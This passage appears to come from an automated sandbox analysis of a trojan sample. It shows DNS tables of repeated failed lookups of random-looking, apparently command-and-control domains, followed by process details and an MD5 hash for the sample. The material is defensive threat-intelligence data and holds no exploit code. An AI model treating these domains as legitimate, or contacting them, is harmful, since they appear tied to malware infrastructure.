Apr 12, 2021 13:03:20.232626915 CEST	192.168.2.6	8.8.8.8	0xa53	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:23.479829073 CEST	192.168.2.6	8.8.8.8	0x4916	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:23.647763968 CEST	192.168.2.6	8.8.8.8	0xb087	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:23.815805912 CEST	192.168.2.6	8.8.8.8	0x4de8	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.043111086 CEST	192.168.2.6	8.8.8.8	0x6152	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.147711992 CEST	192.168.2.6	8.8.8.8	0x6a15	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.250355959 CEST	192.168.2.6	8.8.8.8	0x51f	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.318134069 CEST	192.168.2.6	8.8.8.8	0x3110	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.914566040 CEST	192.168.2.6	8.8.8.8	0x4d04	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.982626915 CEST	192.168.2.6	8.8.8.8	0x137b	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.092700005 CEST	192.168.2.6	8.8.8.8	0xce47	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.204273939 CEST	192.168.2.6	8.8.8.8	0x2cea	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.313347101 CEST	192.168.2.6	8.8.8.8	0x59f1	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.433950901 CEST	192.168.2.6	8.8.8.8	0x8ba5	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.519424915 CEST	192.168.2.6	8.8.8.8	0x69fb	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.067282915 CEST	192.168.2.6	8.8.8.8	0xaff3	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.132898092 CEST	192.168.2.6	8.8.8.8	0xbf28	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.202928066 CEST	192.168.2.6	8.8.8.8	0x44d0	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.271294117 CEST	192.168.2.6	8.8.8.8	0x1d6	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.350861073 CEST	192.168.2.6	8.8.8.8	0xee53	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.464390993 CEST	192.168.2.6	8.8.8.8	0xd58d	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.632875919 CEST	192.168.2.6	8.8.8.8	0x91a1	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.284576893 CEST	192.168.2.6	8.8.8.8	0xff84	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.369936943 CEST	192.168.2.6	8.8.8.8	0xde84	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.504468918 CEST	192.168.2.6	8.8.8.8	0xdfcc	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.646763086 CEST	192.168.2.6	8.8.8.8	0x3e4a	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.735975981 CEST	192.168.2.6	8.8.8.8	0xf85d	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.852586985 CEST	192.168.2.6	8.8.8.8	0x7332	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.921643972 CEST	192.168.2.6	8.8.8.8	0x6ddd	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.051158905 CEST	192.168.2.6	8.8.8.8	0x3c05	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.209146976 CEST	192.168.2.6	8.8.8.8	0x4483	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.280750990 CEST	192.168.2.6	8.8.8.8	0x976b	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.349498987 CEST	192.168.2.6	8.8.8.8	0x842e	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.413965940 CEST	192.168.2.6	8.8.8.8	0x8923	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.546457052 CEST	192.168.2.6	8.8.8.8	0xd882	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.614715099 CEST	192.168.2.6	8.8.8.8	0x9350	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:34.764062881 CEST	192.168.2.6	8.8.8.8	0x635b	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:34.864597082 CEST	192.168.2.6	8.8.8.8	0x6b2d	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:34.929876089 CEST	192.168.2.6	8.8.8.8	0x6ef	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.022841930 CEST	192.168.2.6	8.8.8.8	0xde03	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.098217010 CEST	192.168.2.6	8.8.8.8	0xab	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.189290047 CEST	192.168.2.6	8.8.8.8	0xf877	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.269690990 CEST	192.168.2.6	8.8.8.8	0xb57a	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.344116926 CEST	192.168.2.6	8.8.8.8	0xe169	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.434082031 CEST	192.168.2.6	8.8.8.8	0x5d3e	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.502551079 CEST	192.168.2.6	8.8.8.8	0x33a8	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.589879036 CEST	192.168.2.6	8.8.8.8	0x1969	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.691437960 CEST	192.168.2.6	8.8.8.8	0x6b68	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.762669086 CEST	192.168.2.6	8.8.8.8	0xbed9	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.846787930 CEST	192.168.2.6	8.8.8.8	0x9b2b	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.937725067 CEST	192.168.2.6	8.8.8.8	0x7cf2	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.026412964 CEST	192.168.2.6	8.8.8.8	0x7015	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.083726883 CEST	192.168.2.6	8.8.8.8	0xc7a2	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.184247971 CEST	192.168.2.6	8.8.8.8	0x1a3e	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.275032997 CEST	192.168.2.6	8.8.8.8	0xf69c	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.374141932 CEST	192.168.2.6	8.8.8.8	0x553d	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.464217901 CEST	192.168.2.6	8.8.8.8	0xd70c	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:38.746007919 CEST	192.168.2.6	8.8.8.8	0xc38a	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:38.832190990 CEST	192.168.2.6	8.8.8.8	0x3159	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:38.893923998 CEST	192.168.2.6	8.8.8.8	0xb123	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:38.976767063 CEST	192.168.2.6	8.8.8.8	0x5413	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:39.041210890 CEST	192.168.2.6	8.8.8.8	0xf7d5	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:39.142802954 CEST	192.168.2.6	8.8.8.8	0xe150	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:39.209203005 CEST	192.168.2.6	8.8.8.8	0x199f	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.100287914 CEST	192.168.2.6	8.8.8.8	0xa72	Standard query (0)	9ED2FEEA30C3CC5D.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.262140989 CEST	192.168.2.6	8.8.8.8	0xedf	Standard query (0)	55BE681FC6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.396337032 CEST	192.168.2.6	8.8.8.8	0xcefa	Standard query (0)	61D53B5A4BC1AB86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.502969980 CEST	192.168.2.6	8.8.8.8	0x6300	Standard query (0)	C431A802FF4A46B5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.643312931 CEST	192.168.2.6	8.8.8.8	0x5c15	Standard query (0)	84B5A35D6E5335EF.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.723298073 CEST	192.168.2.6	8.8.8.8	0x1725	Standard query (0)	BDC347C728B2D94D.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.800092936 CEST	192.168.2.6	8.8.8.8	0x446d	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 12, 2021 13:03:10.990920067 CEST	8.8.8.8	192.168.2.6	0xc69a	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.073117971 CEST	8.8.8.8	192.168.2.6	0x637e	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.268290997 CEST	8.8.8.8	192.168.2.6	0x830a	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.393536091 CEST	8.8.8.8	192.168.2.6	0x1409	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.477276087 CEST	8.8.8.8	192.168.2.6	0xeac9	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.564749002 CEST	8.8.8.8	192.168.2.6	0x6ee9	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.743356943 CEST	8.8.8.8	192.168.2.6	0x8e06	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.846792936 CEST	8.8.8.8	192.168.2.6	0xda7f	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.930025101 CEST	8.8.8.8	192.168.2.6	0x2af0	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.271042109 CEST	8.8.8.8	192.168.2.6	0x1d7e	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.363723040 CEST	8.8.8.8	192.168.2.6	0x884b	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.481281996 CEST	8.8.8.8	192.168.2.6	0x7f8e	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.605267048 CEST	8.8.8.8	192.168.2.6	0x2813	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.790227890 CEST	8.8.8.8	192.168.2.6	0xb9d0	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.091034889 CEST	8.8.8.8	192.168.2.6	0x57eb	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.155849934 CEST	8.8.8.8	192.168.2.6	0xf46a	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.273886919 CEST	8.8.8.8	192.168.2.6	0xc868	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.375595093 CEST	8.8.8.8	192.168.2.6	0x4896	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.460635900 CEST	8.8.8.8	192.168.2.6	0x9d22	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.595036983 CEST	8.8.8.8	192.168.2.6	0x7526	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.804666042 CEST	8.8.8.8	192.168.2.6	0xb91c	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:16.693510056 CEST	8.8.8.8	192.168.2.6	0xf49d	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:18.962938070 CEST	8.8.8.8	192.168.2.6	0xa378	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:19.094701052 CEST	8.8.8.8	192.168.2.6	0x4880	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:19.283121109 CEST	8.8.8.8	192.168.2.6	0x244d	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:19.540427923 CEST	8.8.8.8	192.168.2.6	0x6b75	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:20.052783966 CEST	8.8.8.8	192.168.2.6	0xfb41	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:20.292437077 CEST	8.8.8.8	192.168.2.6	0xa53	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:23.554173946 CEST	8.8.8.8	192.168.2.6	0x4916	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:23.707184076 CEST	8.8.8.8	192.168.2.6	0xb087	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:23.892177105 CEST	8.8.8.8	192.168.2.6	0x4de8	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.118012905 CEST	8.8.8.8	192.168.2.6	0x6152	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.224461079 CEST	8.8.8.8	192.168.2.6	0x6a15	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.299501896 CEST	8.8.8.8	192.168.2.6	0x51f	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.375478983 CEST	8.8.8.8	192.168.2.6	0x3110	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.975122929 CEST	8.8.8.8	192.168.2.6	0x4d04	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.056853056 CEST	8.8.8.8	192.168.2.6	0x137b	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.158602953 CEST	8.8.8.8	192.168.2.6	0xce47	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.261189938 CEST	8.8.8.8	192.168.2.6	0x2cea	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.374986887 CEST	8.8.8.8	192.168.2.6	0x59f1	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.491230011 CEST	8.8.8.8	192.168.2.6	0x8ba5	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.580974102 CEST	8.8.8.8	192.168.2.6	0x69fb	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.127104044 CEST	8.8.8.8	192.168.2.6	0xaff3	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.195290089 CEST	8.8.8.8	192.168.2.6	0xbf28	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.259983063 CEST	8.8.8.8	192.168.2.6	0x44d0	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.328454971 CEST	8.8.8.8	192.168.2.6	0x1d6	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.412911892 CEST	8.8.8.8	192.168.2.6	0xee53	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.523794889 CEST	8.8.8.8	192.168.2.6	0xd58d	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.690653086 CEST	8.8.8.8	192.168.2.6	0x91a1	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.341511011 CEST	8.8.8.8	192.168.2.6	0xff84	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.427268028 CEST	8.8.8.8	192.168.2.6	0xde84	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.594140053 CEST	8.8.8.8	192.168.2.6	0xdfcc	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.695549965 CEST	8.8.8.8	192.168.2.6	0x3e4a	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.796217918 CEST	8.8.8.8	192.168.2.6	0xf85d	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.914777040 CEST	8.8.8.8	192.168.2.6	0x7332	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.983623981 CEST	8.8.8.8	192.168.2.6	0x6ddd	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.132924080 CEST	8.8.8.8	192.168.2.6	0x3c05	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.268820047 CEST	8.8.8.8	192.168.2.6	0x4483	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.342984915 CEST	8.8.8.8	192.168.2.6	0x976b	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.406709909 CEST	8.8.8.8	192.168.2.6	0x842e	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.471174955 CEST	8.8.8.8	192.168.2.6	0x8923	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.606036901 CEST	8.8.8.8	192.168.2.6	0xd882	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.672085047 CEST	8.8.8.8	192.168.2.6	0x9350	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:34.821358919 CEST	8.8.8.8	192.168.2.6	0x635b	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:34.923144102 CEST	8.8.8.8	192.168.2.6	0x6b2d	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:34.990014076 CEST	8.8.8.8	192.168.2.6	0x6ef	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.072877884 CEST	8.8.8.8	192.168.2.6	0xde03	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.146889925 CEST	8.8.8.8	192.168.2.6	0xab	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.238033056 CEST	8.8.8.8	192.168.2.6	0xf877	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.318413973 CEST	8.8.8.8	192.168.2.6	0xb57a	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.405577898 CEST	8.8.8.8	192.168.2.6	0xe169	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.491296053 CEST	8.8.8.8	192.168.2.6	0x5d3e	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.563404083 CEST	8.8.8.8	192.168.2.6	0x33a8	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.651603937 CEST	8.8.8.8	192.168.2.6	0x1969	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.740143061 CEST	8.8.8.8	192.168.2.6	0x6b68	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.821461916 CEST	8.8.8.8	192.168.2.6	0xbed9	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.907021046 CEST	8.8.8.8	192.168.2.6	0x9b2b	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.997915030 CEST	8.8.8.8	192.168.2.6	0x7cf2	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.076736927 CEST	8.8.8.8	192.168.2.6	0x7015	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.142843962 CEST	8.8.8.8	192.168.2.6	0xc7a2	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.241729021 CEST	8.8.8.8	192.168.2.6	0x1a3e	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.335172892 CEST	8.8.8.8	192.168.2.6	0xf69c	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.427563906 CEST	8.8.8.8	192.168.2.6	0x553d	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.521550894 CEST	8.8.8.8	192.168.2.6	0xd70c	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:38.803534985 CEST	8.8.8.8	192.168.2.6	0xc38a	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:38.882491112 CEST	8.8.8.8	192.168.2.6	0x3159	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:38.944262028 CEST	8.8.8.8	192.168.2.6	0xb123	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:39.034123898 CEST	8.8.8.8	192.168.2.6	0x5413	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:39.098603964 CEST	8.8.8.8	192.168.2.6	0xf7d5	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:39.202089071 CEST	8.8.8.8	192.168.2.6	0xe150	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:39.268301964 CEST	8.8.8.8	192.168.2.6	0x199f	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.161859989 CEST	8.8.8.8	192.168.2.6	0xa72	Name error (3)	9ED2FEEA30C3CC5D.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.319459915 CEST	8.8.8.8	192.168.2.6	0xedf	Name error (3)	55BE681FC6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.461436987 CEST	8.8.8.8	192.168.2.6	0xcefa	Name error (3)	61D53B5A4BC1AB86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.562191010 CEST	8.8.8.8	192.168.2.6	0x6300	Name error (3)	C431A802FF4A46B5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.694890022 CEST	8.8.8.8	192.168.2.6	0x5c15	Name error (3)	84B5A35D6E5335EF.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.774851084 CEST	8.8.8.8	192.168.2.6	0x1725	Name error (3)	BDC347C728B2D94D.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.850354910 CEST	8.8.8.8	192.168.2.6	0x446d	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe PID: 6336 Parent PID: 5948

General

Start time:	13:03:06
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'
Imagebase:	0x400000
File size:	4255416 bytes
MD5 hash:	29389832E538957DC769CF709F80144A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
